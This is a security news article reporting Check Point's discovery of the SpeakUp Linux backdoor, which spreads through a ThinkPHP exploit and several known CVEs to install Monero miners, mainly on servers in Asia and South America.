Security researchers discover new Linux backdoor named SpeakUp

SpeakUp backdoor trojan can run on six different Linux distributions, and even on macOS.

The 2013 flaw that's still used to turn Linux servers into coin miners today Unpatched plugins are opening the door to cryptojacking.

Hackers have developed a new backdoor trojan that is capable of running on Linux systems. Named SpeakUp, this malware is currently distributed to Linux servers mainly located in China.

The hackers behind this recent wave of attacks are using an exploit for the ThinkPHP framework to infect servers with this new malware strain.

Also: Online security 101: Tips for protecting your privacy

Once the trojan gains a foothold on vulnerable systems, hackers can use it to modify the local cron utility to gain boot persistence, run shell commands, execute files downloaded from a remote command and control (C&C) server, and update or uninstall itself.

Check Point researchers, the ones who spotted this new backdoor for the first time three weeks ago, on January 14, say SpeakUp also comes with a built-in Python script that the malware uses to spread laterally through the local network.

This script can scan local networks for open ports, brute-force nearby systems using a list of pre-defined usernames and passwords, and use one of seven exploits to take over unpatched systems. This list of second-stage exploits includes the likes of:

  • CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities
  • CVE-2010-1871: JBoss Seam Framework remote code execution
  • JBoss AS 3/4/5/6: Remote Command Execution
  • CVE-2017-10271: Oracle WebLogic wls-wsat Component Deserialization RCE
  • CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware.
  • Hadoop YARN ResourceManager - Command Execution
  • CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability.

Once it infects new machines, SpeakUp deploys itself to these new systems. Check Point says SpeakUp can run on six different Linux distributions and even macOS systems.

The group behind this recent scan-and-infect campaign has been busy using SpeakUp to deploy Monero cryptocurrency miners on infected servers. The Check Point team says the group has made roughly 107 Monero coins since the start of their campaign, which is around $4,500.

While the SpeakUp authors are currently exploiting a vulnerability (CVE-2018-20062) in a Chinese-only PHP framework, they can easily switch to any other exploits to spread their backdoor to even a wider array of targets, albeit they haven't been seen targeting anything except ThinkPHP.


Must read


A map of current infections shows that SpeakUp victims are mainly amassed in Asia and South America. Speaking to ZDNet, Lotem Finkelstein, one of the Check Point researchers told us the infections in non-Chinese countries comes from SpeakUp using its second-stage exploits to infect companies' internal networks, which resulted in the trojan spreading outside the normal geographical area of a Chinese-only PHP framework.

SpeakUp infection map

Image: Check Point

The group behind the SpeakUp backdoor is the latest threat actor that has jumped on the ThinkPHP exploitation bandwagon.

Scans and attacks targeting websites and web apps built on top of this Chinese PHP framework started last year. According to our previous coverage, initially, attackers only prodded websites looking for vulnerable hosts and testing proof-of-concept code.

Those scans moved into full-blown exploitation in January, as many security experts predicted. Trend Micro reported two hacker groups using the same ThinkPHP vulnerability to infect Linux servers with the Hakai and Yowai IoT/DDoS malware.

Akamai experts also saw a different set of attacks, with threat actors dropping web shell backdoors, cryptocurrency mining software, and even Windows malware.

The group behind the SpeakUp malware seems to be the most organized of all the threat actors currently targeting the ThinkPHP ecosystem.

The full Check Point report, including indicators of compromise (IOCs), is available here.

More security coverage: